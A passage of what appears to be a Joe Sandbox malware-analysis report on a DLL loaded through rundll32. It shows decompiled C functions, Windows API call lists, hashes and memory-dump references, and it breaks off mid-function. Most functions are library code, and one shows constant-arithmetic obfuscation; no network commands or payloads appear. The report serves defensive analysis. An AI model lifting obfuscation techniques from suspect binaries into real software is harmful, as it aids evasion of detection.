Associated: 00000004.00000002.247793384.0000000005026000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5000000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 90dfeefd38f75e01370dc876bce88f56e9c09399b8e708027c51eb7b0105ad5f
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 961112B1C4030CEBDB44EFE5D94A6DEFBB0EB00708F108588D521B6250D3B89B489F90

Uniqueness

Uniqueness Score: -1.00%

Function 0502061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0502061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0501FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E0500EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x05020624
0x05020627
0x05020629
0x0502062c
0x0502062f
0x05020630
0x05020631
0x05020636
0x0502063d
0x05020644
0x0502064b
0x0502064f
0x05020667
0x0502066a
0x05020671
0x05020678
0x0502067f
0x0502068b
0x0502068e
0x05020695
0x0502069c
0x050206a3
0x050206aa
0x050206b1
0x050206b8
0x050206bf
0x050206c6
0x050206d9
0x050206e5
0x050206eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 050206E5

Memory Dump Source

Source File: 00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp, Offset: 05000000, based on PE: true

Associated: 00000004.00000002.247755060.0000000005000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.247793384.0000000005026000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 0e4eac6476257207a61ea1196add9c2c5b70a1efd4db1a3161d32576c6ff3c6c
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 5C2113B1D01309ABCF14DFA9D9499DEBFB5FB20354F108198E529B6251D3B48B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100011C0, Relevance: 10.6, APIs: 7, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100011F1
_memset.LIBCMT ref: 10001205
htonl.WS2_32(00000000), ref: 1000121B
htons.WS2_32(?), ref: 1000122F
socket.WS2_32(00000002,00000002,00000000), ref: 10001245
bind.WS2_32(?,?,00000010), ref: 1000126A
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51

Uniqueness

Uniqueness Score: -1.00%

Function 10008B90, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10008B90(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				void* _t41;
				void* _t66;
				struct tagRECT* _t82;
				void* _t84;
				void* _t85;
				signed int _t86;

				_t37 =  *0x10057a08; // 0xfbf2b489
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E10013247(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x188));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

APIs

IsIconic.USER32 ref: 10008BB3

Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A

SendMessageA.USER32 ref: 10008C01
GetSystemMetrics.USER32 ref: 10008C09
GetSystemMetrics.USER32 ref: 10008C14
GetClientRect.USER32(?,?), ref: 10008C2B
DrawIcon.USER32 ref: 10008C7E

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A803, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
					E10009BC7(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10017D62(_t39));
					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10017D62(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10017D62(__eflags)) = _t34;
					} else {
						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 1000A830

Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC

Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62

__snprintf_s.LIBCMT ref: 1000A869

Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
LoadLibraryA.KERNEL32(?), ref: 1000A8B7

Strings

LOC, xrefs: 1000A828

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100167D5, Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10057a08; // 0xfbf2b489
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1005afc0 = _t6;
				 *0x1005afbc = _t22;
				 *0x1005afb8 = _t25;
				 *0x1005afb4 = _t21;
				 *0x1005afb0 = _t27;
				 *0x1005afac = _t26;
				 *0x1005afd8 = ss;
				 *0x1005afcc = cs;
				 *0x1005afa8 = ds;
				 *0x1005afa4 = es;
				 *0x1005afa0 = fs;
				 *0x1005af9c = gs;
				asm("pushfd");
				_pop( *0x1005afd0);
				 *0x1005afc4 =  *_t31;
				 *0x1005afc8 = _v0;
				 *0x1005afd4 =  &_a4;
				 *0x1005af10 = 0x10001;
				_t11 =  *0x1005afc8; // 0x0
				 *0x1005aec4 = _t11;
				 *0x1005aeb8 = 0xc0000409;
				 *0x1005aebc = 1;
				_t12 =  *0x10057a08; // 0xfbf2b489
				_v812 = _t12;
				_t13 =  *0x10057a0c; // 0x40d4b76
				_v808 = _t13;
				 *0x1005af08 = IsDebuggerPresent();
				_push(1);
				E100227FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1002b434);
				if( *0x1005af08 == 0) {
					_push(1);
					E100227FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 1001C445
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
TerminateProcess.KERNEL32(00000000), ref: 1001C488

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF59, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FF59(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E10012862(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E1000A7CE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000ff5c
0x1000ff68
0x1000ffb0
0x1000ffb2
0x1000ffb9
0x00000000
0x1000ffbb
0x1000ff6f
0x1000ff73
0x00000000
0x00000000
0x1000ff75
0x1000ff82
0x00000000
0x1000ff96
0x1000ffa5
0x00000000
0x1000ffad

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetKeyState.USER32 ref: 1000FF7D
GetKeyState.USER32 ref: 1000FF86
GetKeyState.USER32 ref: 1000FF8F
SendMessageA.USER32 ref: 1000FFA5

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA3A, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10057a08; // 0xfbf2b489
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10017BC1(E10027E56, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1000A2DF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1000A8D0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000AA59
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
GetVersion.KERNEL32 ref: 1000AB55
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
_sscanf.LIBCMT ref: 1000ABBF
ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000ABFA
RegCloseKey.ADVAPI32(?), ref: 1000AC09
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000AC6B
_memset.LIBCMT ref: 1000AC85

Strings

GetUserDefaultUILanguage, xrefs: 1000AA82
kernel32.dll, xrefs: 1000AA6C
ntdll.dll, xrefs: 1000AC14
GetSystemDefaultUILanguage, xrefs: 1000AACB
Control Panel\Desktop\ResourceLocale, xrefs: 1000AB6D

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C11B, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1001C11B(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x1005aea4;
					_t40 = TlsSetValue;
					 *0x1005aeb0 = _t7;
					if( *0x1005aea4 == 0) {
						L6:
						 *0x1005aea8 = TlsGetValue;
						 *0x1005aea4 = E1001BDD2;
						 *0x1005aeac = _t40;
						 *0x1005aeb0 = TlsFree;
					} else {
						__eflags =  *0x1005aea8;
						if( *0x1005aea8 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005aeac;
							if( *0x1005aeac == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10057d30 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1005aea8);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10018042();
							 *0x1005aea4 = E1001BD03( *0x1005aea4);
